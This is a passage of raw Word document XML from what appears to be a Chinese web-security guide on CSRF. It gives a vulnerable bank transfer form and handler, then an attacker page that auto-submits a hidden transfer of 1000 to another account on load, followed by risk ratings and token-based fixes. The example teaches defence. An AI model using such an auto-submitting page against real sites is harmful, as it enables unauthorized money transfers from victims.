            <w:tcW w:w="830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AC9F08"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lt;form action="Transfer.jsp" method="POST"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="155DDDF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p&gt;ToBankId: &lt;input type="text" name="toBankId" /&gt;&lt;/p&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D19CB7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p&gt;Money: &lt;input type="text" name="money" /&gt;&lt;/p&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71A04410"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p&gt;&lt;input type="submit" value="Transfer" /&gt;&lt;/p&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C6008D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form&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7882F4CA"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后台处理页面</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Transfer.jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的伪代码如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8302"/>
      </w:tblGrid>
      <w:tr w:rsidR="00802AC4" w:rsidRPr="007824EA" w14:paraId="230D3985" w14:textId="77777777" w:rsidTr="006B4954">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F5F32D"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public void doPost(HttpServletRequest req, HttpServletResponse res)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="407EE0AF"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E7E838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HttpSession session = request.getSession(false);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36887F60"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If(session==null)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D8B5B98"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5645A84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response.sendRedirect("../SessionLogin.htm"); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49550E92"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F1CD70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String bankID=request.getParameter(“toBankId”);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7071CEC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String money=request.getParameter(“money”);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59179591"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BankTools.transferMoney(bankID,double.parse(money));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78D1C8B1"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D6469A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危险网站</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8302"/>
      </w:tblGrid>
      <w:tr w:rsidR="00802AC4" w:rsidRPr="007824EA" w14:paraId="695F2698" w14:textId="77777777" w:rsidTr="006B4954">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036DAD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lt;html&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7375CDB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head&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="096178AA"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script type="text/javascript"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B5ED869"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function steal()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00A13F5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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4508992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 xml:space="preserve">　　</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>iframe = document.frames["steal"];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75E7E96B"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 xml:space="preserve">     </w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">　　</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> iframe.document.Submit("transfer");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CF2B66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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="664BF25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script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A9DEA66"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head&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67361442"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body onload="steal()"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20B41393"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frame name="steal" display="none"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="375FC1F3"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form method="POST" name="transfer"</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">　</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>action="http://www.myBank.com/Transfer.</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t>jsp</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FA04F0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nput type="hidden" name="toBankId" value="11"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7405CCB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nput type="hidden" name="money" value="1000"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D8C43DB"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form&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2913F04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frame&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CF5340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body&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65D9A36B"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lt;/html&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B65B104" w14:textId="7B160A8F" w:rsidR="006B2341" w:rsidRPr="007824EA" w:rsidRDefault="00802AC4" w:rsidP="007824EA">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>从以上代码看出，危险网站</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暗地里发送了</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求到银行，且该</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求是转账操作，攻击者访问危险网站</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时在不知情的情况下向攻击者转账了</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1000</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>元。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4744B62D"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320DC061" w14:textId="5EC33B10" w:rsidR="006B2341" w:rsidRPr="007824EA" w:rsidRDefault="006F734E" w:rsidP="007824EA">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：核心系统关键操作（账户操作，审批确认……）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1278312D" w14:textId="7FE1C302" w:rsidR="00E87447" w:rsidRPr="007824EA" w:rsidRDefault="00E87447" w:rsidP="007824EA">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：普通系统关键操作（账户操作，审批确认……）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549A0F85"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修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F875BB"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t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>referer</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断页面来源进行</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防护，该方式无法防止站内</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击及</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>referer</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段伪造。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC98842"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t>重要功能点使用动态验证码进行</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防护。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7D399A"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t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式进行</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防护：</w:t>
      </w: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31A32" w:rsidRPr="007824EA" w14:paraId="308072CB" w14:textId="77777777" w:rsidTr="006B4954">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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177275" w14:textId="77777777" w:rsidR="00331A32" w:rsidRPr="007824EA" w:rsidRDefault="00331A32" w:rsidP="007824EA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="71"/>
              </w:numPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Session</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中绑定</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>token</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。如果不能保存到服务器端</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Session</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中，则可以替代为保存到</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Cookie</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>里。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="568EBE1B" w14:textId="77777777" w:rsidR="00331A32" w:rsidRPr="007824EA" w:rsidRDefault="00331A32" w:rsidP="007824EA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="71"/>
              </w:numPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>form</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>表单中自动填入</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>token</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>字段，比如</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;input type=hidden name="anti_csrf_token" value="$token" /&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D1FF637" w14:textId="77777777" w:rsidR="00331A32" w:rsidRPr="007824EA" w:rsidRDefault="00331A32" w:rsidP="007824EA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="71"/>
              </w:numPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>HTTP</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>请求中自动添加</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>token</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E355EBF"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在服务器端对比</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>POST</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>提交参数的</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>token</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>与</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Session</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中绑定的</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>token</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否一致，以验证</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>CSRF</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4AC0B26F"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lastRenderedPageBreak/>
        <w:t>为每个</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="007824EA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建唯一的随机字符串，并在受理请求时验证：</w:t>
      </w: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43D3E" w:rsidRPr="007824EA" w14:paraId="31E8AB72" w14:textId="77777777" w:rsidTr="006B4954">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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8A1A40"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lt;form  action="/transfer.do" method="post"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="161DDF7F"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 xml:space="preserve"> &lt;input type="hidden" name="randomStr" value=&lt;%=request.getSession().getAttribute("randomStr")%&gt;&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1313C13D"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 xml:space="preserve"> ......</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77E8FA2D"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lt;/form&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FD29951"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w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>判断客户端提交的随机字符串是否正确</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D5093C4"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String randomStr = (String)request.getParameter("randomStr");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="674189C9"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if(randomStr == null) randomStr="";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="584FDE14"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if(randomStr.equals(request.getSession().getAttribute("randomStr")))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B077AFD"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w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>处理请求</w:t>
            </w:r>
            <w:r w:rsidRPr="007824EA">
              <w:rPr>
